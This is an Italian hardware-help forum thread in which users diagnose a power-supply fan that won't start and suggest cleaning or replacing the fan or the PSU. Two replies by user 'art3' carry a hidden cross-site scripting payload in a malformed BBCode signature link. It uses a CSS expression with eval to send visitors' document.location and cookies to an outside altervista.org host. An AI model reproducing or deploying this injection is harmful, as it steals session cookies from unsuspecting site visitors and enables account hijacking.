Valutazione 4.87/ 5 (100.00%) 5838 voti

Condividi:        

Ventola di Raffreddamento non parteeeeeeeeeee

Se il modem non funziona, hai problemi con la scheda video o non sai che processore scegliere entra qui!!

Moderatore: Caffey

Ventola di Raffreddamento non parteeeeeeeeeee

Postdi TeDo » 12/07/05 11:11

ho un computer vecchiotto e ogni tanto quando accendo il computer la ventola di raffreddamento non parte e magari dopo mezz ora parte oppure resta ferma continuamente... e comincio a sentire puzza di bruciato ... non so se è un problema meccanico o è un problema interno del computer (BIOS)... grazie
TeDo
Utente Junior
 
Post: 59
Iscritto il: 30/06/05 11:55

Sponsor
 

Postdi BianConiglio » 12/07/05 11:42

meccanico, fai cambiare la ventola.
BianConiglio
Utente Senior
 
Post: 4710
Iscritto il: 26/12/01 01:00
Località: Varese / Lugano

Postdi nykky » 12/07/05 13:21

ma se tu la fai girare con un dito è dura?
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi microguru » 13/07/05 16:05

MEZZ'ORA SENZA LA VENTOLA??? :eeh: ma stai parlando della ventola della CPU?? :eeh: io ho sulla mia scrivania un triste trofeo: un'Athlon 1Ghz che è rimasto DIECI SECONDI senza ventola e si è fuso!!! :cry:
cmq il problema è meccanico, a meno che il proccio in questione non sia uno Z80 o un 8086 e che la ventola in questione sia termocontrollata... (chi ci capisce sa cosa intendo heheh :D )
**** COMMODORE 64 BASIC V2 ****
64K RAM SYSTEM 38911 BASIC BYTES FREE
READY.

Immagine
microguru
Utente Senior
 
Post: 1267
Iscritto il: 12/07/05 14:11
Località: Milano

risposta

Postdi TeDo » 14/07/05 11:35

se io faccio girare la ventola con un pezzettino di ferro parte... ma magari dopo qualche minuto si ferma nuovamente... non parlo della ventola della cpu!!!!
TeDo
Utente Junior
 
Post: 59
Iscritto il: 30/06/05 11:55

Postdi microguru » 14/07/05 12:49

E di quale ventola si va in tal guisa disquisendo, orsù dunque? :eeh: Se si tratta del trafo, o cambi trafo o (se da piccolo te la cavavi con il lego) lo apri, cambi la ventola con una analoga e lo rimonti (io l'ho fatto con ottimi risultati ;) ) o se si tratta di una qualsiasi delle altre ventole di sistema (northbridge, system fan o quant'altro), sostituiscila.
**** COMMODORE 64 BASIC V2 ****
64K RAM SYSTEM 38911 BASIC BYTES FREE
READY.

Immagine
microguru
Utente Senior
 
Post: 1267
Iscritto il: 12/07/05 14:11
Località: Milano

Postdi 12 » 14/07/05 14:47

si sara' incriccata ^^ ... cambiala che fai prima ..
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi wolf80 » 15/07/05 08:22

microguru ha scritto:cmq il problema è meccanico, a meno che il proccio in questione non sia uno Z80 o un 8086 e che la ventola in questione sia termocontrollata... (chi ci capisce sa cosa intendo heheh :D )


e perchè ci sarebbero persone in giro con uno Z80???
:eeh:
:lol:
Sono il signor Wolf. Risolvo problemi.
wolf80
Utente Senior
 
Post: 195
Iscritto il: 15/02/05 17:45
Località: Genova

Re: risposta

Postdi art3 » 15/07/05 09:44

TeDo ha scritto:se io faccio girare la ventola con un pezzettino di ferro parte... ma magari dopo qualche minuto si ferma nuovamente... non parlo della ventola della cpu!!!!


Non mi dire quella dell'alimentatore??

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/file.png?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi 12 » 15/07/05 10:24

TeDo mi sa che fai prima a dirci di quale ventola si tratta ^^

in 10 post stiamo cercando di indovinare quale sia .. non siamo ventolveggenti :D
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi art3 » 15/07/05 10:40

Di norma nei pc ce ne sono tre di ventoe: x l'alimentatore, x la cpu, x il la scheda grafica.

L'ha toccata con un pezzettino di ferro, credo che l'unica sia quella dell'alimentatore...

Pertanto gli conviene cambiare l'alimentatore !

[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi 12 » 15/07/05 10:52

bhe io avevo un medesimo problema con la vecchia scheda video .. avevo avuto i muratori in casa per mettere il climatizzatore e c'era un fracco di polvere che è entrata nel pc , e mi ha incriccato la ventola della scheda grafica, oltre che a fermarsi faceva rumore , smetteva quando tiravo due cartoni sul case :D

si, comunque penso tu abbia ragione .. forse è quella dell' alimentatore .. ma ripeto non siamo ventolveggenti :D
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn

Postdi hexen » 15/07/05 11:40

sposto in sezione hardware
hexen
Utente Senior
 
Post: 1340
Iscritto il: 15/07/02 11:10

risposta

Postdi TeDo » 15/07/05 12:27

La ventola è quella dell alimentatore...
TeDo
Utente Junior
 
Post: 59
Iscritto il: 30/06/05 11:55

Postdi 12 » 15/07/05 13:12

art3 lo promuovo ventolveggente di pc.facile :D


allora ... i casi sono due ..

1 - smonta l' alimentatore e vedi come funziona ventola e come è collegata ..

prima di smontarla pero' puliscila a modo , senza soffiare e senza phon perchè possono creare dei piccolo corto circuiti .. pulisci con il cotone per le orecchie :D lo rimonti per bene e se non va , riapri e guarda come è collegata la ventola all' alimentatore e se è fattibile l' eventuale cambio ..

altrimenti

2 - prendi e cambia alimentatore .. nel secondo caso elenca tutto il tuo hw che vediamo che alimentatore fa per te ^^

ciauu
12
Utente Senior
 
Post: 1413
Iscritto il: 12/01/04 19:45
Località: Milèn


Torna a Assistenza Hardware


Topic correlati a "Ventola di Raffreddamento non parteeeeeeeeeee":

ventola gtx660
Autore: sidartas
Forum: Assistenza Hardware
Risposte: 23

Chi c’è in linea

Visitano il forum: Nessuno e 5 ospiti